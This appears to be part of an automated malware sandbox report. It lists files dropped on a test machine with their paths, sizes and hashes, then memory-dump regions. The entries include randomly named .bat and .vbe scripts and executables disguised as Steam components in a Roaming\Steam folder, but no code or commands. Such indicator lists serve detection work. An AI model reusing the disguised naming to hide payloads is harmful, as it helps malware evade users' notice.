SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
110b59ca4d00786d0bde151d21865049

SHA1
557e730d93fdf944a0cad874022df1895fb5b2e2

SHA256
77f69011c214ea5a01fd2035d781914c4893aee66d784deadc22179eadfdf77f

SHA512
cb55ac6eca50f4427718bace861679c88b2fdfea94d30209e8d61ca73a6ce9f8c4b5334922d2660a829b0636d20cbdf3bae1497c920e604efe6c636019feb10e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ec66606831e595ea115f35d1b61b7105

SHA1
f22d025450dc8dafd9b434b2eb31cb876bcb8109

SHA256
4f17fe98ecf3ea9ec9873ff0a3acdd6ca93eb17e280a01ff6cfeca4422019dec

SHA512
f2922870f0b34b5cd8a75ce3aa94362a43997a752b0e8e9001f63d650225bf15415a75ce8aa333e4d3554a52ca5d40eec7b15ce67e3ee20441cf2680de59ed5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ab24765a7393bd3cef8acbf0a617fba2

SHA1
ef2c12a457a11f6204344afed09a39f4d3e803cb

SHA256
3a03c7efabe880ae9f283b1cf373d3f09d07ab619028319b3599b643ae140d47

SHA512
e16306674a8c89f54467d7fba3857e1e0bdf3729f5de9f4451520cfbddfa535c4d653dde6efcac38efd693e9b3e4965fcd08c559e720c372feca65050b46e355

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
735388b98281cec7d063b1b470c13632

SHA1
7536ce1c5f3732fac491d7038e24124551c4290a

SHA256
843fced254477f5ad803cc98e853d7ab674852d5e94bc174497691b736d49e69

SHA512
30244c596f4c3cc0194186a210170f04985b77fc90f10cff0a2fbd07e079944e5f8c9998759219363033c450b6a4093ad1b3d75e0a0fae1aa6208a61a88a9717

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bc0c9eafdc0931457084e036a9e65009

SHA1
47e16681e9ef1d429d510e123537a38f149d11d5

SHA256
c153db1cb94b4f18475ab4349d6c88469a9dc94abd6a3c9232d261d40c047ca5

SHA512
87f5d9c826fe5aa6316e7c94b66b39cc1086f6d9fefaee3d9cf2b172ae34f1769220d6ec7a4ae49aa8ca6d3abc1c62e9212ca9ebf4720a5ca46e6f34e32df0d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8005014028d9df556f2fe7f3128360a3

SHA1
8dde6ebf12ce79eba432a8969ece767c1dba81d4

SHA256
9fe186d8304132169445fbecc53ee702080f9f8f701e2398516600ab0479c781

SHA512
7da99eae8113349b8f63d4a54586c6329165c41cdba0c2726880d4894b3a3b2f8d56a55e4016edc7d883cb8d8267555eb1c44f0e720668a433a92e343238ceed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
50abdd8ac84da01dfc82d7f9aeeb79c2

SHA1
8f496399ca9b2e8270f2a3a4d4faf875ae3bc9cd

SHA256
60403b2c82ec67c8cc4fafa7867d1e1ed846a2d02248a7ba148b285a62278f09

SHA512
5e40c90669e841a87f36a7b2e6354f0bb4ae09f9a50a2c6e995d795ea1f55f602d3b2533d61296c7c145db8c57d6f1d956e33b40c15b3ef42e6f0785c9d1bd47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
dc0eb1839781c4bed27d3b94a4f3fc88

SHA1
40432a27ea09d935efa2d769464b8f687a36af14

SHA256
c76800855c49d5639d1ab7bbf105c0ea8eb9a1003aa2ad9656fa57357e47f53d

SHA512
06ad9fab6f49d07cef550078cca0c0a40013c9282deb0c46c66bbe1b4dde8207e42c23451818ab04aab3427063bd41a7c8ea852884dee2ddaf123e8d4cf089dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
cd9c8906b7d24b6fb64f1de932770836

SHA1
8b2544fe17966386c8372ae72d46c39cef67f55d

SHA256
cf6897b39beac5ca090b011f4878ccfe22b231848811c0f3b3b8655a127a8180

SHA512
18ad267cce27178d2ee0d05dd426db393361b6f2c8ab9d85e52be9e5f5816fd54b61a8a4f5af25c55774655d6685ae9a2ff3553973f32e3ee68c849aa338d896

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
f3e3b761df43188cbf3e7e4f4ea79bab

SHA1
aac5a4394c23a8c56f3b373c4d22b721f7ffcd7c

SHA256
70c2b4d04238936bf854ba3c2b825a8acae68b5c17c4abfee4ea10385a5da6f5

SHA512
f4023e81d84d9fb9e19d91080eff211cbb5614cdd25e206e453412fe87e539bfc5b32f42ddd5fef779f0e43e756e4b08fdcff04be2bfcff285e3b4e1ae85afaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
6b4090ac7eac2f4ced801b4396c9b6e5

SHA1
73a2772fe0aeeba011748377f67f6a60819e940f

SHA256
30f24f9d9f1a990c8277b8cd9560f6ad03e1abd0c68c39287bb29507670c2189

SHA512
523656b70489c30955ebd66d89dae4c4dea5ffecd0e74b62f1f5247621527a935ff29794008eb1f68b9cbd5c79cb3dc1a3de42e46af64b691eb745704206303c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
9bfc850413503d8b073d9f85b7bc22fe

SHA1
a88a764dabe27778fecaba7bc4f9a6a5c845ba09

SHA256
eff0068676b894cb2e23ca6e2b8e1c336253b15a0f11e1ec2ea690b6aaa2d620

SHA512
28f39f9104decd4c4aba40ce40d73d2d286dfcca5d96fb7c360b02f000f9acf5ca1fef73f7cb36c91ee30c9e3b0d6ab2c73704cc50830bb8020bd2b10b114cd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
a5ace5b1e1392854c698257bee4f3e7a

SHA1
47aed60a3a2fc5157dd62b0849a411f616fb3072

SHA256
c99619b5acdc7217bbd262106129ea1661b531c2890476300771b706477d9734

SHA512
ed15a10ff08892d8a49b04c3b208016be3f416813ed233e30c2d41ceb0720b5c987101fa4dee8d5adafcfb823784c40011f1c1aba141110f3a7a5a276e14144e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
00c85ce3e5878d51166eb88094e684ff

SHA1
d7eab2ac1d59f9ead42ec83357aafbb0c7280e6a

SHA256
3006f37d4324edaf5257e106837e107fd0b511db3e06706b0950ed4aa0d5a717

SHA512
dff2255abd6bdfa3a2dda693d61b1eab93cc81fe9b2890c5889dd524239df263896d871c3649b7567fbf6b737ba0186a0df10307c9171c4bae40efbb5ea44fe5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08f86f017272edbfb8a05ad1aa5c4e2a

SHA1
186538c6db1fdee11a710b408ec2f5e5be3ed11f

SHA256
a9fe3286de6d757b746404fbb4d49e1d78d47ce0496e4a6d4b8958ae1985e8e7

SHA512
dfb0b9d2dd09a391517fabe071c30187e094cc6ca36e22a41268b6462cc95cd5be314427c6acb128745feefc1e13b3af03b45a3f6c18af5d495fbaf9ef1465dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5c58b17a444d55a4d50546305df28a28

SHA1
7fd63ccd16564184ccdf7f3cbe3b7bd47487419d

SHA256
54c534d456167fab408e57ea553881af3c597324cf5d81c595513c2f1111e909

SHA512
b44d3f17f143fc346bb64e279a44f93540c4bfbc54fd9c3f592a928bb4e9baabdc5b5bb916ffb25d7e3474bbf174dbb2bf057c1bb8abdb7f4e6454895d0a2af7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
816d03b14553d8d2cd19771bf135873f

SHA1
3efdd566ca724299705e7c30d4cbb84349b7a1ae

SHA256
70d3acdba0037de3d175aca44a86daf8392b2350f6f8b026b7accb02f95a9304

SHA512
365ac792e05619e5ef42b40f1e4dd5d1ebb18a5a409be9c5428e52be7896f4b18eef2a93a4e0f5e1930996bf70798fe45fc5b6d829687d975191015944dbbdbd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
59d97011e091004eaffb9816aa0b9abd

SHA1
1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

SHA256
18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

SHA512
d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
70d86953e0e87172fe3c5b87aeef391b

SHA1
2ef2d6c603654a7dc0b428722840b9957a8e057d

SHA256
a8c1c49758922ce91f1124fcfa69f4566826cc746db8bc2c04b1826b41a97923

SHA512
1c8605a34c5d73879bc09e4be87a8459e2f07dd089fe1a7fea69de91249bc797b5e062e5ca8606db686deb414515253c4918a52ba3d6b99404a343931d64b601

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfex43wr.pek.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\y7gOE9huL6.bat

Filesize
197B

MD5
f2aca8e1ccff7256d21469ea3d9c995e

SHA1
952f6299d8d092c839078504c7c88f6bc9ae7804

SHA256
80de4afeba2ebd4ac70512d89a5d7f1bc26864ba78faad6f70642f7d2de044c7

SHA512
93ca1b6d378a3e5c675ceb5056151e8b119aafe55d270950303dcff31eee89edf995c221f0ed0212c57dbda9b9be1b3949532d879ecf3bed38fbc5bfb4eccc96

Download Submit
C:\Users\Admin\AppData\Roaming\Steam\1964hQskJhjU.bat

Filesize
36B

MD5
649a4773958bef8120faff53791b8a0e

SHA1
29b6bb54053829f831d87a02e89ae7400003d522

SHA256
f354a1846fda9dfeb4593d4045e3c6de5238956e45276115d1f5089f90ee3d3d

SHA512
3d33ca788e40e82ed9fd667c4a14cbee531363f9150d256111ea1917788ddede53b5e79f7cd5d14f7c1f5760cedec67c9221949d01cb882185120c13150ebd07

Download Submit
C:\Users\Admin\AppData\Roaming\Steam\JdNzo6aXzPz4ZVLaHlpQ.vbe

Filesize
201B

MD5
30505b04df2c1e585af4383fd906eafe

SHA1
409466743e5762e56c5d717387b3cbd32c815d19

SHA256
746aefd5f95c76855093e41e4495c7813f006a9c80fe7dab6fd87e115e1439a4

SHA512
4b541986aee42351338e63836b51bcd873980db9f41c102c9c4102bf629f5ce3126c33566e20be47122306bb699f9156e6abc3b58ac69d0364a1353ec2572741

Download Submit
C:\Users\Admin\AppData\Roaming\Steam\SteamWebClient.exe

Filesize
1.0MB

MD5
892dbcf1bc0c71fd59ea1d96821a917c

SHA1
d6a1c0a69ab9a1274656147c75450858383bbb72

SHA256
68507f43f9acc1b4c6f29d9270a3a6960961ec07f89e9f8dbb065c5f9e4844f8

SHA512
502a55176627dd4f52d46fec52d93a881f057374bb6964da5a45b704ec3561c89fa12f964b13e96c1e0665c0678356d4eb6f0d7e4230691bd524ac3f26df56c4

Download Submit
C:\Users\Admin\AppData\Roaming\Steam\SteamWebHelper.exe

Filesize
139KB

MD5
25ad124237ddd42fb26bfa9a18261f25

SHA1
94f74941d3e5370e2301783054c5773d58609738

SHA256
456e789acbfd8683ad2d57ddeb991a7fe7bcff910a1c56dcdcefc163e77019da

SHA512
3b361a42f654a34c76c5f6d20ab7a0e70fcafa3bc2fa7aea25d52f2e17ad63ddac367fa0b37d581f00195184875e8ac409bf79c71eab1404d4ac52477ffe81a0

Download Submit
memory/1296-36-0x00007FFC19A00000-0x00007FFC1A4C1000-memory.dmp

Filesize
10.8MB

Download
memory/1296-38-0x00007FFC19A00000-0x00007FFC1A4C1000-memory.dmp

Filesize
10.8MB

Download
memory/1692-19-0x00007FFC19A00000-0x00007FFC1A4C1000-memory.dmp

Filesize
10.8MB

Download
memory/1692-20-0x00007FFC19A00000-0x00007FFC1A4C1000-memory.dmp

Filesize
10.8MB

Download
memory/1692-14-0x000001FC7DCA0000-0x000001FC7DCC2000-memory.dmp

Filesize
136KB

Download
memory/1692-23-0x00007FFC19A00000-0x00007FFC1A4C1000-memory.dmp

Filesize
10.8MB

Download
memory/1692-8-0x00007FFC19A03000-0x00007FFC19A05000-memory.dmp

Filesize
8KB

Download
memory/1692-24-0x00007FFC19A00000-0x00007FFC1A4C1000-memory.dmp

Filesize
10.8MB

Download
memory/3020-616-0x000000001B730000-0x000000001B73A000-memory.dmp

Filesize
40KB

Download
memory/3020-618-0x000000001B720000-0x000000001B72C000-memory.dmp

Filesize
48KB

Download
memory/3020-617-0x000000001B710000-0x000000001B71E000-memory.dmp

Filesize
56KB

Download
memory/3020-615-0x0000000002CB0000-0x0000000002CB8000-memory.dmp

Filesize
32KB

Download
memory/3020-614-0x0000000002CA0000-0x0000000002CAA000-memory.dmp

Filesize
40KB

Download
memory/3020-613-0x0000000000A80000-0x0000000000B88000-memory.dmp

Filesize
1.0MB

Download
memory/3124-607-0x00000271AB7B0000-0x00000271AB7DA000-memory.dmp

Filesize
168KB

Download
memory/4344-578-0x0000000000CD0000-0x0000000000CEC000-memory.dmp

Filesize
112KB

Download